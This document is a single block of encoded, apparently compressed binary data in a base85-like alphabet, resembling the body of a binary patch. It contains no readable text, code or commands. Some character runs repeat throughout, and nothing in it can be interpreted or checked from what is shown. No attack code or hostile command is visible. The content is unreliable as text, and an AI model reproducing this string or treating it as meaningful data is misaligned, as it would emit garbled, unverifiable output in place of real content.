zf&METUJ7#K(RQ`IK@qjbR~w>k(Q?hs04>qwP4QLOrM_)-v?Cs~gHuUA3##d?t|8tI
zy0&(#hgj3m*3z&%-rgLeHw9HoGv043YieF8TCMuvfQ|lSxMIps&nJwbj@pg@=L3U%
zznj4|tZb8+%;1Kewm%FRTpy};Zw}n}Ot4o97U#PW8|=A7+`boMo_r=Trc0_wQ2o`<
zN#a&q*)B1Qe2zCXjLJ=#xG|kkNR_}d@5O+H1a8|vC?atAiM(FmnYCoV?EL}j<#V|W
zjV3|d%A8QEz-d2XL#IiQ{yi2%yjI|+3cN?)L4mIq_-O*)DDcw-zDeNrJrJSI0xvab
zMq31arogufobMNG*k%&!7j?*nL6abUwgnOI5qO!v_X_+Rf$tNzy@w#QU*Ph60N<4|
zFmmXpz#aN2aEE>h+@YTWcj%|U9r`J7hkgpYM73D|i3r@Gp8|L2r@$ThDR75=3f!Te
z0(a=Az#aN2@Ste_dV!xNaQZ-DVC2wGfjjh5;12y1xI;e$?$A$xJM>fF4*e9kLq7%X
z&`*Io^i$vt{WOhWwnIM!?$A$xJM>fF4*e9kLq7%X&`*Io^i$vt{S>%EKLzg4Pk}r1
zQ{WE$6u3h_1@6#Kfjjh5;6cdR2K(-d@;}Xjh&KxQ(*?ds;12y1xI;e$?$A$xJM>fF
zCaG#46u3h_1wL7{bFaW1`YCXSehOUbXVCCuwjoi-G#74pMO?Ujp1aP4&osw>#k>9J
zswTC^6Ss514p0ABlfNMPLESO0Qf;q%A(NV)L3Dz&GVmNI#4jX4qz@dWfwczb^DxU6
znPYnnQg?{E->+^kbneJqKXryY|Jw2#-(2-?2F`FmDh-Z<1VyMoI#>T2`2qxC|2Q49
z|6}lT_kR{J)?bdF4C_sYq%Jex_TR>J0+Z$GCm~m`<!m1HnoV?d)3?o(4_ZPK+xA;H
zh6H)K%kMMgTP>l9-Q_!g=aOH@TpSurIm(YJWy@Rr$yGOtgvb=3%EbIG;K$Eh-s{`I
zT0>~}@FOn<xBPg`%O&c~rv105QrSQ5@_5Yd?po9Jj=v35R9;kB^%w4abm;tS{UMe7
zYrYNGos#Geykdk7CE@p1cmyx8uJ+;AvN&+{pxUp8CUeCHSZDSRT)NT%Wk|IIjsfF-
zIFxM!QkUAy+g%*3M;;s^!Y6$X6l<hrvMPOWcRAc<8lQ*5ew%`WWPjHITPpFW8l&o@
zDjGK%GkgmS)3d=V@u(V6Sh*QKBmJF#hx+Y6r`{jwJ^X>wVE=VDeFF6!?ojD{m>_!(
zpN90UoxO)oRT#e$_a5eDH_-PA@^3vSakwDRM?Fm(&JS!zAc6cK^Y6`Lx&Z0)T9rH&
z#crM0dpLkNuwf}k(?12jfy6668yTU$^4sY$C4IT#5hn5c-ouxZ`0lOH>E6SqGu`(o
zRc5a#b4M}Ahx%gx@t-18g0nG92=A^z;dH0sdL_A{2@A++!w+#Pq`!^afy8FpgvFS$
z(%(i#@8M@j+|+yc84}-pei5<zh|TCd{27JK!93D?xR)51-b!pk51C#9*$gB)Ez>3(
zrdJ?iAQ7@y1ZC5UR7H8GYo;TL>3xdni-zgX71Q&`v<fX4NEBNJjbw1FVo->=H1-|{
z8*yO65zr;~^}PJ^OMM|6_x}#Z!$)Zu<v~V6HC2r0pt5*7Q#*?B2NDa9`~X&zXZl9C
z@aza#Y6q9qq&bK`S$EOt%TaM8adSPm75aj((VTh!1lYlX`w9g5*oGaf9*#Cu2JHHd
zv0nMp`;l9hjMs}%>f`cbqtQb(jpWsPbA%lm>an|cBD)9pP|qH=8X-1y2UC(wKiOC%
z&?nhYO{DlVoKvA#`UqqOE{!NP5?YIlATrVifDYBLm)WA0g^AIp4b*^46L_^CSMcEJ
zV49rfOHe?ZAJZQm&6aF_#Wo~g#WbNeSb!npgpob5aoftlXZRHC;r0C;LD3YP?8kJ!
zwCy<LCTk+5B5qpISFU^0L*i8Zgh;Y}DP%@Af&NK4Z$0vcdN`#p4E2;Fm4|=JhkB+V
zneW@itn@-q_a0^yf&OOz!0@%cF15C3d3b2fgd?z+RU)I8ab{vHgF-VngJm_NVlZ8(
z>i&1ujgCeJ{)Mk}BZ(&qY0?{e!Z^^c9hk$Z3JQ|?2noXLug0{fN~Jc~65LJZ2$^W7
z`_-v$GG{yG3+KgPF`+v7`*U{ICZ9S02uk%Dq(2G$fR*u3O$)JPO{4OfZ?%GBunZ@p
z8Oq+9)g{i3V~-u!K;N^N3T&bDZX6^Y-9m=36BCcJ6_|@?2ZNHYp~5sT>PUx}egnAS
z520<r(ZNu#Fh28O=)}DEC6=j;*`mGRpX%QaQ9?w1w&rviz^1pM9vsz^>sPXAW$l{&
z1b|3tphrc$tOj~eGSs^tDTaf)HpJjyebkh=VHs+Jb?wzXFXhF@DPF@@K*UfCaQI*=
zZHf0B42AMzzffXDRu9<i+>gDrKBB8x7)rbZAM}6BJMsIyFLCPa-NnB%_TGB;@Ym4b
zMl{%-6twzC-5XNO`^o6wuDlqw{}?DIlz4a(AnfmQa93gc^hj#GuHXZ~(7`7QV`F+=
z%8yM5_53OrAA2x-VqWZop`K#!V?Z^Xs3v{!TO%VH1;5OY*?v>HU3zR3HT|gBJR6f{
zK4=`LcMo`TAXvp2C^S@4hQFY>xkR0$yx&#gf$Qr^qU!o@kU;<8tPY?gTb5GFg_Ah_
z^ZzFA+H788o9b%(I3r24W+Pj35lJ#L)2%P2KjHua8)%;f;?1fDji}m}IFuis0BDfq
z-=qlC#v*E5v!1x~W7wOlUk}SRH7tR??~pjLU1<qS`yuN{;;3M@`au5{P^71@3B9|D
zNu7Lk2Zv~+9)sN9gVc@?{s4{)Yz$`VR-1!?Cf%waMVQ#8=JxnR6kLxodh*ZHrLAZ;
zd=>?4Uy{tzwRjiaz7yTv!M=-jZ{U|8du-0_Kwl8HdEkxS_=aJGug@Lo#}r-ZUNFHn
zN+RQUol%brtMUJm$3_|9YI$-F)8|fd;~v%K%*HMw^~I>5?>i{8oi`mjScj~EE_yg#
zXxDz`pRVO$YBR$(QXeFjKG5z!i!uz-<4x)9FS0BdfVU|WNk!_bQ=z39(MCXQWP#dz
zB-X->1%{ORQi$nE_?Dm#DW~)p9NPBUIPs{uCo^q~<HB_bNHa~-w<APU)u^NqHIIaD
zvioHvYs$qPN)UwLj60N!V(?PNU@m2FFaid?^d0!4FHX3Pao@HKx8Z`L$K~kTzKymA
z`j5PUo6kpESvGzY@6F$x9tM>2EZ;voxjGe(RL^)l(Dx*WlJAe`8>qaXZC-UU9!Y<R
zJojJ&%*pJ+Nxal2ckRf}5b=^fTmTBS&}Ecsdw2(TuUmMBR!aZ0O~Nq#9}fStO^U@`
z?%tI)@M^?|9NhN&)$47}Rh)31BgSKi3U~4)jcYB<%*<Mv+5W1;xN3i6LF<HEi&apR
zZMsQua@sU)bYc8HaK8&PhdCq8X8#CVr!!D*E?cKr7H7i{)SQnvil3q<h+uK1{}HxM
z3DhfXoz(aO<9Kka+~M;8a^YY0z#s6ycYEMJ^uT}afu}w2KYHMQsf|(v#xGZYFZICZ
zdf-=k;5T^Sw|d~b&&t)FtsXdUE_2cU%me?m2hK;GTzmo^_+$@!t_SYr>v@d_{aqgT
zy&m}e9{8XK&i8b=`g_O&Kc*lz{iz=K#UA*T9(acbeuoGCaS!|(9{7_U_>VmB1Hd_N
zJizM#f{A>8GWehipM(n%>A&m3&jy}L&J`Z`r5<?118?xa+dS}Y51c*$a<y~71Lr13
zx#+o`BNsm8fph&uF8bF!@FHCBbI~8?fuH7q&+x#n^uVw8z&kwf9uNFqJn$_ZINws`
z>Mwn9=E8sHfzuXJeWa1LkY-_?({j-PX3QUFRAo)+a#Bn$uhh1V9=R7913hEhn0q}V
zt@gBAWUhInKW=3r*#NJ}9bIr@jkvv|VO2+SlQP%i62$Hp%^R7L)|B0`j!tC*Xw54@
z2H(i!ZwwB*VOZE;+S(e$ibj|F@0m+xH_WS<M-Sd=<s{Q9x;nB4%3xC&3~Eo(%i_zI
zN3n4c?F+f2v*E^NZ5<67)rN%%h1p?SH$5@akFqcWHJ+Ir1ymbV<B<D-IDM3>3Y8J%
zs<vo*tU)(jb)OcO#tc;1xhi{35H!K*w6%`xXwc@OrrlW)G{bbWZFw66YivcOeCU}w
zx)#Qo?Jy9f?`P%Pyu0m#l2&kVwpMa#>1dDoX4Wpywv|l8&@1CL-Q73Aaa6w@O;QDo
z6KR*9>nzW#Z|p2HI~W>K4aInON4vSV7PO^#Wz>jV<*`9Z;o{c*RKrRz)_k?QGinF6
zD@vE}-O&#;z;bn&QI4qqAa`fg%1^t)$v7I`KoxVVQA4~F*2+=s&wI3AcVn08I0-$@
z+#IK?QIr41LYd9VTF*KSXa8xP{Qs|YGCts_fZMxwWShLu(Bm?!t}}LhbDO|vH(+tD
z^JgGEZRIT9O%Q=N%?T|26@m!F`7CVlhY2DOr>&gDA18?5rq9Fuyv1olXX$?_aN5vW
z{1t)I{=(ulxUXX%f7;Ml{QUx_4V}f;2%Ppq7Psrj$>$V-e^k)ZhR)Ler@(1LXYt<%
z{8WLTNyZ3_g7{hb^93&ZJ6+(X3HqA^e!9Rn3S7#Q-|HC|oq?aNw*mJX48*0}q)+ft
z<XL)aq(%BO1wI|$?-+>7{@y8Y*{_cX{4A8Q{0|9S(klZY!~bkSKh>NVthY?y{DRCt
zT=IEM;O8LE);pny)T8Mq37qenEd4@((>}`LEdrk`@Mi>0Qy5Fn5AO_Y=M?-bK7Tw>
zjbDJ+;*SZuT;OA2O~F7u75G{D69g{xVVb}z1^qmMPZjvr1wKvSuL*p*z)#}0I0Uxm
zLi}ud8U%ikz*h*oO5oC`_6&i4-q3SCq)nCO|F+;G^|{JC*Reh43Htj4{$7DUVsQ6-
zJLJYuhT%Cko?~stWtvp|wfFv<&Mp@?=QIZ5Atp=+nwU8IYeShy5D!}rF?EB1_)L}3
ze<)i9;<Hpr{|T8i@oJN16ftSyH73od-lU1oHfcsnO`7-|lV;Rt(!?!KLahR?HEBkj
z0-r1JwF19F;5`Db6Zm?8&lC7YfzKECCV?*y_-29Iz7yIa@GDK4(N=-mYcZj10;g`-
zFlZ8#&ms#V-XrkE0^cj}B?8|k@T&yAU*J~@yoePdFmmXpz#aN2@DK}{5EQsWKLsAP
z#EAJtn}Lx-KLzg4Pk}r1Q{WE$6u3h_1@6#Kfk#x!^dI#Z(zMf|pMu_@p8|L2r@$Th
zDR75=3f!Te0(a=Az#aN2aEE>h+@YTWcj%|U9r`J7hkgp&p`QYG=%>IP`e_=$Y=?dd
z+@YTW59uLPe`(~vKt2xr6nI!s=s)&bHtA;yyh_kJ^i$vt{S>%EKLzg4Pk}r1Q{WE$
z6u3h_1@6#Kfjjh5;12y1xI;e$?$A$xJM>fF4*e9kLq7%X&`*Jzq#7N*CuiVzIrLND
zOBIFwvsd5_{S>%EKLsxJGiZ1++mI-P_ecyDKUW|6dQ5C_`+oW!7jEBA+v|&^x9_L_
zx3BrwXYQwrSk$=MG-IzdAFX`&K-e}$$7DmDDAI?SwX<g#yujc#DmlicoH2RGFc}Br
z`PY``Ju!K@%Lh&Uf9;x&;F(~Gu-`oAu>TZ=yZ@ZKSbsTwG87f-Bi<v+VEb?5I%L|k
zq?>BWON?nZ?RCJ|M0w7T&idvK@<0UJehbBrAWwJsrKWy+pJnOY<vWm3h+oJO*!X;%
zSZj_czoYQ8<x32nt8Qi$Pt*iUO#u!kuQ%@Ue2jCCJxjLop#|ZH(O-QuT7Il1SNXN3
z{kPbHCU(mopA(u_wP&3?mj|;!r}f_pr%h8C6%`j5hfwd_$8*L(3EB`+?FeQ3K^aF-
zr}mC;7-R3!4xzS_%G#UJA(TlgXHem*!b{*!IkWVm+_ChdOf3Bf%B3H{17w>0^XHa+
zV5Nt(nEP)Rd;Hl|9N|YdVwBWcj&39ZcmEjez*-KKJ_P0KJ$yFOT+4B$!f3FGwHi$K
zU5JyztmXI@B-L7u)1gGjhlU6G8Xz?+FF-m?6M){s6UmBeIaqwdn<$gM94E&>V*l^V
zT8=N_F#R)R^d9C;G+Z>XfW&wERa+_yg9{Xc2gzU=8Z?j?v<$eOEBz^CV0DJYen%{+
zm_ADeT%Dnq2FJ3Z`-pLMhQe-D74;J1>I`BV=CLBS0IM@B)2TR2Pg51uTWpwEP*wDM
zG6?n_epNC3G|rTPM9|W$!C{(jk$Mk17h${%jEgW{HH$EQfaBqljhQ1YD<RA5l8lki
zDy+(&<_Mcd&Mn&J(YY$)giDnYn{__bpi1|EduBBT%EixB8faHzynt-iYK%bNe*knZ
z!uTdIIBm`vxAtu&XKkE`R&&027<vIi%~qg2NLeG)fsMOyM0@@pz5ZouqzQ!G+@fNn
zyq9vMzXwUagGCr8>GrG#$3&Gcc2cGl5o)rwNev=3JPyre0*0KyNGe`p+d1RSKp)ND
zm4M((yClseKcdSU9>TFUfz3N{u=J`id%-0=1`0tF+{9BObpv&!w5o^mbH20nZRdHl
z<1GBCOZ9KT=`qw#`xE?!1$1NLCQxaF#IdWgcEPF>+c!g}3u4C(G1oVwtWsHYcsg3W
zG?ExB#0rVPgY)yTfT952=U>0y2sgQrix7rXJ;Oz`P(H#onz1uPi7NCVu|GJ5BbN@L
zDkCttEMb~jmN3N@C97|NRc1ND(GcZpD328b$0Hd+a+tQ{OemvUBir-@(ExH;jbqT&
zgO2j5X=E3b;E~(^6Q0Z=SCRMXB8@1Lz6br2je3uuHBwA$9|RZG$Ko-aD3rX73pi|p
zb_x!X(+?C)q=&W8uG{9>n2p~G8Y8U4HdV{E&7cnls-H-|i4n52Hf9;FR6>VImwp~J
z#*#V?59QjBd^@M89n7}~i}7<pRxS9l0=eL`6?9f_wek2+&md)p5b-i2{~h}SP2F*<
zqOz9W#yp%)B2M%0B|t{ClMJ?hgKcFS(3-5hcnJ355j%(*?o_q)_n<B`*hk_Ndi$M7
z;-$leYb045J3nhJ-t%I9pzmR}E%BW~ltJH7LGe(i2nk>MGx%fH*I1MD{otzXx;2x%
zI2`_vl;0RM0-RLFGMVvPh!PngmZ&wS#CBdec951rRx=W)GHSVj8f|%Grhzk?G2@Tn
zxMkO1rB7De|Dr`9SCYA%ILlaXc2Ni&fO+L@1*L72p*iR)%<7fV61yBOYh7>5?$vnN
z@zB$GZ0tzSU1U3;9s(lCdF3OaPI3JS>N=&(J$-F4XjA(QNC{K>w{VzU2bROszTwSL
zruKD!JWTDUW=!qR22s}39+x*r0<BV}_D7TFo{`}({DW-~4l1MjgRx>PHgqhpW5<rS
zmiQSSw8W<oJ{I;)op5FudJr3<WEDy5F1JSbp3XsqtI@|%G<W!?O@3~<{9i%;X_No=
zv&rW-LxvE3<xC)OK{##lH{@e~ivjL$aaUp3Uv~SL+5YmxSeoPiVZ6T_2zILg1$LUq
z?p49(d<H&;Ghm+ZtyifmHVMa{bYbQ&XT(YVf6^A;%H#~xo6Emwjm6DeuBJO+QHvvH
zusGBINLzf{A2qIM%ZKsfxVXa?0OZ2I;(`CW2mXWy{=5gi-vj@R2Y%QCr|*Sa?Vsd<
zpY4Hj|C3yN7J1-N5Bx?CyvGCgvc><V2mKxo{8t`$0rWLjze+st=^pqZ4}7Hup7g-)
z^S~eQz<KALtNp+9z_~~_7d=kKoOr+kKg$F6vbnGGpy#^eT<uxmfv*Kl8~0h9j}h#g
zI$-bxF8qFjzt4p~<iUTZ2mZ7NzRv@H)dPRa1LqzWx#YmNO1bcNd*D+%aQM^6$>(Yh
zyww9wc;K5n@XvbS-|)bn^1xs8z<=j~k9gq4cny<Fo@aUBRUSBB@8sgM!UMm>1E)>A
zdWmiAb%kBE(<Z(WbjsY?=`YyYyssgj9Qo6X)qL*U>E+fYzS;Qr{hu?6_q1+T_R@c=
zLHj6Udm|lftWK-%&Uklg)(qQWhM%$6HfT;O@X_Yq&8<<o?4^Zv6U?idR;}phYKyh5
z&ekFrISte~?4~khpKfFTE~ee0q_7k>nWLMcjl#7;tciBDEnk<h%O}sj-CCRthK)8F
zJ=#!R>9DX<&xkW)a8CIvhs;d4&F}wOLv*gypbuxgQp2j3S|c%PXDVZ(?l@(#HtM5c
zI}GNW)N366X`|i+FWmpDJZPV;Z!6R{S$^Mq+Z<1E<G7z>xJF0nJ1nmU)`qiF;CR26
z!Q%qwt5i$>L4hA9@XraH&xn@(n*u*x;NKRwq<>D}CkT4p4>I6#>98>_#(fF{aegnh
z^_B|!M1fx@aA~9dpunY#`VN8fdxz!!q`;+(dI=kX!00{rS^9GXPO}M%|3TogzvtsR
z%)sm*ewMyl;HL@v!vd#nSo+Tk{0xEb5_qY=zb|mvo<e+iVqklu93}|-Oyt>m%LFdz
z%LRUxpubMwlD<XYXAAnIz$N`B1YRcSPsZ0w2Dbkk{A@cb1TOhpCGc|v{R;x8-G=4!
zhQKEaysQWZ2&|Xp0+ycc>==kkId==3=dz`zXEz4YUx1&*pB8wzz+V)2g}}#hvOpl8
zO8hLJGYrntj5ZV&?-ulY7h&<Q3tYByMBvi|eWiJ>VZGA@KG)!^mqp(;^VL;u9C-}O
z+;|S#?-`m@{k8YLWJ{ZK8>DT?#TG;yG-=XbV$zJtOqw|5V*_Q*K>Sjb(tp(FY=cW%
z%8;QU{pBXjC}PsYLnh6r-lU0#O`6eClO{gXq!~4uH1Sy`&8XF+iC3F6qfV11USraX
z)|xc&*(S}X$E1nRF=<BYO`5pv3!#kyuQh2#n*=^r;F|?5Z6>z}yiU+>75F@XZxc9m
z%Z5RdU_0kq5b+*?OIyml0<RbJ`viWa!1oJ$p}>n+Ap#?ZehS>7p8|L2r@$ThDR75=
z3f!Te0(a=Az#aN2@DMv<LcPGl7DT*M;12y1xI;e$?$A$xJM>fF4*e9kLq7%X&`*Io
z^i$vt{S>%EKLzg4Pk}r1Q{WE$6u3h_1@6#Kfjjh5;12y1xI;fpBbe>bPk}r1Q{WE$
z6u3h_1@6#Kfjjh5;12y1xI;e$9uj(3FYvIy>0^X}{hg^&`cI?49r`J7hkgp&p`QYG
z=%>IP`YCXSehS>7p8|L2r@$ThDR75=3f!Te0yjw|ph1B<^i$xAggm9~w?jV#y+c0*
zF7-2Lcrx3ND1`SI3>N1-3WL3VS=_#dy-R0j=<R#h%`V)&hyCAf`@O>4Pnqtk^TDPW
z^I516zYu;hl<;O5f$u39Cg8_&sfY&%B|7rl%l8YedJXxg`X?iUJPRy=iQj4Y3qj9z
zxy#$VX#ZN<@3PZ$L;hOZ?=8pZ@_dGnfo)~5G0#<-RvG5cbEdq+n0C`%2aJy<@|+>v
zK2tu(0}<@_Sty1CdAiFVGUc~gLKC~od)a;$oudob^OX8Sm9XWl{^Y8gCAXN1h?PH^
zL&#lzJTUjz1M;osLl?pZqrduSwEQL_BUkwz)Bam*K@+>>kJsj_+LmS9{Rg$Bx3>S*
zY5g~2`&~Y*;zE`E&TYRtOS6p#sbmPIXvIDn=qTsUX@Wdj6iGf83Ox8c?3QYiKaM1S
zoOpZ!9QzkXQgh&r{HD^PNUF2w0I4G>990}lHZ%^+X;DC8ck%laqb1;Scwr<3cgWi!
z&<jnUd;*@aV-cFpMN(^v=|tJs5~Xf7ER7Z5@a}g&q}lT-E!fAO)NrE{jvWUhDpwuP
zYsyv^<%KyZ|7?>rv$alU@h6wQ@BPX;YFiMqp|+b}T$_A*$(5?jux;$)XYK91l;;4S
zdVP=eK$%330)4*(S~2+Wenc?rdi~2LvtLNIUx=Y!^u0gRyD;o*t5Ck5O^m_Yz4FkF
zx+AGa$tW_^--n2S15*}BJW8H$=8Y6N`eFg3$PXr97|8e%-Hw!^lY^<q9RN!?05(DZ
zX4qjrTT%;)v!dGMS4!8TqPpa-;rmw^(_Q=i@O4UlR4rZez$2tNaQB~RB9~y=p>7!{
zE1L|I6;TGtNGi*Vt<+VebXBMVf>Kp6`93|MSDU2}Y#C0Kl1S<f)fkTMw^$;zRrPn^
zF~W7Jt(13NY75(i4KCQ0NNNk~uS;#?AViX}(xL+o;YCVBS8PWA^)Dwr1e<R7epXEw
z>ak-eeB%FHHMlmp(-4IN+h3f}J+3aPIj0tv7S$zn3zE78N!@~^Y5}ZfRa=vq&%wmU
zpdvl7qM-uL@x#YQQnQM-bBF7c?@}7>1*&%?3t$UaVr>D#4N53lzj?lok0jQX6~^-`
z2Cr2)Trsi;bAu8_B=J~1=g#<XNG(;V@ymzqXhbTHhW5Qf%r;~2DJ9k9tAU3SB#7iC
zvY7)Zrm-`?`4o6^2<Kg9N(<wRd&3OQs0~W&U?sNchWI0iZK@%GK30b|VDl0?;VH34
zQW%}cjIE@<3G-rIX)&5VV?9gVdKA{WgaZ=`ONZ+N#XTfZM@p-gM*_F(ik$O@$T@pz
zlaoqoVQg8n?%2r4cOqj#GXvNf!eF(DOG<t5;@VzR{I7VTx^>L(7i%hBj^NBFff;6@
z%M7!uF1i1G=H$q=1xsXr+JwHKhQW%#c^DH&8@zqD9*yM)NEQ16pB{`rHOPLFo4p#f
zNa|lHj)(ccmby)i&*1XJp-TdDb}mn<<MgRVMn-rA;Q&93j{6{rMfFy`0~<rY?D7ZN
zODq57fr&~;k(3(T<wI&@^UR352UT_ATFilBa2J`D;oM8zMqBBT!K8}e(0$F!%!#3j
zVyB1+T`=R<x?S=8il=t)MJd!pWk*sUWglnUwjSr;nz2b08?a(9v7Ou}tT{zn^j6_?
z*g;dGtVJ&@Z1s#l2`G*bbxX!7*-Uc%gKOu(mYp>{jN*_c1v4^;_ClCu8B<b$vE#Cv
z(14BBXu(eds8(NNl%8+*1<^44d~C&)6?)$XBW;u&Qkz|{V$;G~PPH8Ck}u)}nu07V
z5$DW{t2$=4#E~mv*Wf1MR-|fU7bK3%jfE0NCI<R`ih}7pa84Xq8|eEajuJ=K1^OOU
zi5p{;X<o-7$?vIpF*5}29Sl4;nEnw^1*M-B`RPF(r0!@0KXu#j2%8*9`BG&wE(r8}
z4hNbKZ$d6Ei;b&zA-z!-*#t_A^vPXCy_a*Q8lHfole&J^dpRvl1NS^0c<_bc6^f~1
zksOT7*mvt=>UPFxYjP8(VO8burJCsR;c1Q{i38;<w%%EcnlpTKB>A7Zan1WUHAa&A
za2H^1^O}A7i)=9S0a<@5&mN-}e|6wJa;^|?f$n3QeJT=OJS@%M5_|D>x5s^K>m2_V
zwoiW>4|c*^VX$L)a6xCZ9nSrN6;sNmR0b<6gL9kOgO%kKxbd1ZYu0;%WlNUD+hg(I
zj44y6l%HR5QCuD7aG1^K-D3RsXfS8~5+8<rkQmNn75Kf9A@73=eR*q(^G=>Hu4p6l
zl4WossDgPsQOD&5t7Tl{FHYoN?GLW-7l-{t>bpX{$@lXt2>Xj~&ky@c5(U-%V8NI?
ze+dv$YW_DFTKo81hU1L}3$Z+GfA7k#_LtmV01MxO3SC~?`0|<R+lKbTj8$9mQ)FI^
z!+j?2c*Eyz+7NG`4e>x>)~|P%e!b`T>+}CBms@YjCdl##C-D#JSd0ovk>sq((8WK%
zZ)ZCbY-fIx?I!6sEier8kL^#QV2(eO|D3<1TA3`fp7n<A8q!7l<@xn~wWNBp!R@m(
zc|KsUcG9Z4>ulW%6;Ftm^7)COyT{Na^7A)PKIC!8<lSiUZqLuZ`Y3-<&Czx0Z?&Zh
zLSYyh`A4;XKF0&&$qr*UF&rE>-YGK7Bwy7gGw$UDl^8d4RFAtN%JGNA{+_ng)UkY@
z=`_+-r-KH!$4ak(@jWo<t<MIf&%hYGZK%x$TTPbvTabB@&p;|spxzQVF&-88jvfsv
zeDtieL{akW9vuqQS4by*Ee?5ZyF({{T==aX_$Ckhs~-3^4}7-={)`9yE8w(6rL8lA
zojcw}ns|r7Lna=JI9I;{9{9UGaIWym#b+9D*86p%|7tEmTQ2vYuQl``GXbml3G_=m
z=&$#{+YFy2g(!@m<|o7-^q{}f(03SmHE)6blOFV6^uQnVz#lXGX*0^8<~zjCdeFaQ
z=)Y@JSIv8%f6L%!np4Tndw$55a;`VHn)^V1D)3z6GQ-gCF!X8;1pSpB^w)df+**<K
za$hwDHD4m`^`QT-2TogZ@_EYeX(TfQu4~QJ{_h(4b1+{ssCgCfk38sq;ej9Yz%j|-
zy_yjY_^xLq2*(1?)t-|*aM~v2qMzY`FY&<JJ@7sc{9_*Y7d`MNfV01wRWGys{h`8*
zkdb$e$)}AlUv^p(VHj_=bhkFGgkN5mmqs&&o$$n*$#J+`)())UyczDBr?ho<HBBk^
zO{tqz?#pfLtBo65te@sT<Ih=pmu^@MJJ2S$X6{tgG<0@!`erS>rhf4P<w4ljiH5G$
zNzJd7M@=hM(}A=y(KNM2mp8>%X)oCw@tAN1tc*x$acS7DZi2(?W?LUKOx1#$N~(ea
z)IPd1?y6O`#&i>u^=eyZtM$??j*TdUA8%yRp?AmfmZo*e130O>;B`CeVLHoIQKD0$
ztWh;dTeo%&4nNnOZC%k8)A^Q;__9?|m6esqDCgpOjJu-E9bGNffwyL>t&&aM^a7n}
zC%uEaT#oA^)T2>VLZ!N5%c4zoP`aYAuBP_x)o?Seb$|}VwH8>{)T`RMW6^e1pYgeF
znnXY0e9S<BSZjyv>8iH&l?|)g+8b8K;@Zer*$5k3-O7e&d$V!|?~ASKuHcbQ(2Kc3
zw9Pn;p_f55R%&oXv_0BIZ`G@t(3mb5EH|U&I?rVXt=zaPPI%62g70hPCtZ0-SE#b=
z*4ETnuxS-7otryaqM9cLuLA&D(boR|*n1c7D64Z{d~yN8EfW<rZczsf8meL<sEM~`
z$PD>L2aH@4uL(jT6oeFJ0FNRQCn5Rx9AUS*WuM*C(o@>9>uyVHD<KvL7YVesMSG*Q
ztyrrv9WPWA(JFI(zjc{e`IxEg?th>2f1Y#J^UQqf`>l7q>wf*-cddIthA`*PmZ^n|
zekKVrBfv}?^Sv~JL9j-(cMe;p;-_W8<{3EW=Nf<5z)v@DClCI412<*kzHZ<qpUru2
z&Yx%)Pm@o-KqYR*^Y?l1w+;ME*mb(zH*k}`mi1w{CjYZAPSX%K`HV4elMhwmX-IFT
z_xe2eWCJ((aGpftj?V)I&bg3I*II>R7#tuA$lYQZ^5J)3P0#ra4RNl2HNGnk{*yfT
zZ}Q;OiKB7zzn&3P_&Ip$aBs?kH|N1Wn+Jb556)8`Xc!-}TzU+gdo4OXoPW@e-i+s;
z^57rm!OJl2(zy9tkO#laz|DB_{144%3@kdHqsbVCkMr@<_#FmbVc=gk@CyxmkAYug
z;N#T1mCh#pHUs~ZLH{QM=Nv=FXSAAvk&j9LuLf?0`)vcSH2D0<z|DLx&&94X=!Xu$
z3k<_G`GgF-8g4qCcNjS5<Ql)%z%McI#Rh(vfp0PJu?GG}12^OUv4LM{&<|BpHpc%V
z13%lq&2&W#+|2)O1Hath^SFUuVc^>goMVU12ffs0d?<6K@v%ek0^`Of<iT$@@T=iZ
z^U>>E^5J)UjZcT2hWKgtY5aEtVECxSPvgBtJsEG{-!}4jf`RuL_(TJTRTy?>*D5<7
zDtoZf87M=n*9gR~C!sRs>Ph_58pPA5?8NJooe!pkhPYqY<ewhLiBB@{I%Ox$xT)+N
zAd5`=EJfF>o}{l=c0T4QJMn<B^RYtNiL<NI`$#btu3kMG4BX7OO$L6QCdO0G2gu*d
zw;qGu%(p%RuTyqD_9;90_?4ZHgUU|a%(p`Z&iv8&cEpA2d=mu%H}Wy_P0t^QoB38w
z0EQ1U-+V4y5aG|KETrX68`eo0jqCiMA>j;ut9p;QaJ`T8m<!kYNPR9`@ALfDh3oyC
z3Kf4HAH6@r4{$UZ*ZVMYUAW#qdBlb5eUgnXT<??gxNyBsa>#}2{g97bxZdBWP?@Xa
zsrM_wE?n<R{3m1z7vmnA+2b+$t{z|Q8NZ}u;q37Ofeo+1)iZw1;`_Kv^^9M%IMOm6
zUoI|%aw(P<^8MaL(eZ6d7Pny)aKB>FGLLIpTqE`Wjq!mEvq*K98K!m0wm>%s^{%or
zLzhq1aDBNXsZsqZ>nr`TjnOFQyt0N*y26#dBoA%plVdS?s_79SVg6SC9QzqBj)|tx
z{>Pah>^lAW8B~}%{6i}K+)p))&wPQs4nK}ve46F}C!;WJsy;IRSVr#ry9pSBP-L)4
z;~OrY?)dwZyMD00pnuMpOcPT6IR`S0PL6&y!%^E!x`^^`Vzj$y+kml(xZ}S<`S-!i
zG&=nn>xP9q-Tv1r|2qFPz1x2r4!QEb?tJNEy^1jNpI;@ke_elbg-xF&s)OF78kQGW
zSq}fKChoce$g_DA|2>}9U5@Vj;~dFFBK#e^Ks-F3laI{5+dsDd+7@Jwx&35W#|gC)
z{$5$fBSzz@6EUg7{9&XAXG9M1K7H#De-ATh+z;&o_VYWBm$bhe!)s(*_5R7;r$-FI
z->AW%^uFM@=K}@%{Ps?e_}_m%Fm!(?emot0F?DVZvZ16B?tj>MsH9_mq-aD8Vg@f1
z9N6vG(qR;PvfAHRkH9SFOAIsYe4R%b8t3MARIq~a3igJ1IN5S!`!gK)>iqCx<D^PR
zrKm$q{{>{py#RoV;}D$&h+^uC?#ul4UI^%&(I402W`B@1-;+E86&DA+c{^^R-}trz
zM7<q;zB$_t;^i<AN@sLj;s%wNjNg7Xe!Om3xs~9G5hn$bE+J-D!gIiR#s|p1^X-yA
zkw`$W_Tyz2^lkvLke%61A(5=uOfSnTxlo422njA@hv0Bx3qmo`q5ed$AW(aJ`8Gr`
zhx-NL#M}zYN<76-1NH|2`%jP?lu;S?By%8D9&o-wOK{v90bAI@MPHHm7Ay%<z^nQN
zNWp~d6FLhUOCYB+2w4>!?2rE>ojO%;eJyOK1!LsyVSoFxo;rkBE5cYlDA;-I{v27p
z0VzUGAHu^EnI%h<{+9WqAkibh-8sUonbcicE(d}6dKUo7nS1Aww%Xu3Lh@x(Ont3C
zu7?D_IQvjlgjCspGcIu~pykNQcanfv`yN)=fPKV}@S7g8j|ySOy(Lz>f5hQ0V;yAg
